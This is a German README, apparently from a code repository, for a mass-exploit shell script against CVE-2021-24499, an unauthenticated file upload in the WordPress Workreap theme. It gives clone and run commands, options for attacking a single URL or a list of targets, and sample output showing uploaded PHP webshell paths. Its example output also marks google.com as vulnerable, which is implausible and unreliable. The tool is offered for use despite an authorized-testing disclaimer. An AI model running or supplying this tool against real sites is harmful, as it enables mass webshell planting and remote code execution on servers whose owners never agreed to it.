
WordPress Theme Workreap 2.2.2 - Nicht authentifizierter Upload führt zu Remote-Codeausführung
WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Datei-Upload, der zu Remote-Code-Ausführung führt
Ein leistungsstarkes und präzises Massen-Exploit-Tool für die CVE-2021-24499-Sicherheitslücke im WordPress-Workreap-Theme. Dieser Exploit ermöglicht nicht authentifizierten Datei-Upload, der zu Remote-Code-Ausführung (RCE) führen kann.
CVE-2021-24499 ist eine kritische Sicherheitslücke im WordPress-Theme Workreap (Version 2.2.2 und niedriger), die nicht authentifizierten Benutzern erlaubt, beliebige Dateien, einschließlich PHP-Dateien, über die AJAX-Aktion workreap_award_temp_file_uploader hochzuladen. Dies kann zu Remote-Code-Ausführung (RCE) auf dem Zielserver führen.
Verwundbare Versionen: Alle Versionen bis einschließlich 2.2.2
CVSS-Score: Kritisch
curl-Befehlszeilentoolopts.php- oder shell.php-Datei (PHP-Webshell)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php oder shell.php im selben Verzeichnis befindet (Ihre PHP-Webshell)Einzelnes Ziel:
./exploit.sh -u http://target.com
Mehrere Ziele (aus Datei):
./exploit.sh -l targets.txt
Hilfe anzeigen:
./exploit.sh --help
| Option | Beschreibung |
|---|---|
-u URL | Ein einzelnes Ziel-URL ausnutzen |
-l FILE | Mehrere Ziele aus einer Datei ausnutzen (eine URL pro Zeile) |
--help | Hilfemenü anzeigen |
Erstellen Sie eine Textdatei mit einer URL pro Zeile:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Upload, der zu Remote-Code-Ausführung führt | CVE-2021-24499
Erstellt von Jay Maranatha Hutajulu
https://domain.com/ >> ANFÄLLIG!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Upload, der zu Remote-Code-Ausführung führt | CVE-2021-24499
Erstellt von Jay Maranatha Hutajulu
https://domain.com >> NICHT ANFÄLLIG!
https://www.google.com >> ANFÄLLIG!
https://www.domain.com >> NICHT ANFÄLLIG!
https://google.com >> ANFÄLLIG!
Dieses Tool wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
Durch die Nutzung dieses Tools stimmen Sie zu, es nur für legitime Sicherheitstests und Forschungszwecke zu verwenden.
Autor: Jay Maranatha Hutajulu
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.
Beiträge, Probleme und Funktionsanfragen sind willkommen! Schauen Sie sich gerne die Issues-Seite an.
Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm einen Stern zu geben ⭐
Denken Sie daran: Verwenden Sie Sicherheitstools immer verantwortungsvoll und ethisch. Viel Spaß beim Hacken! 🚀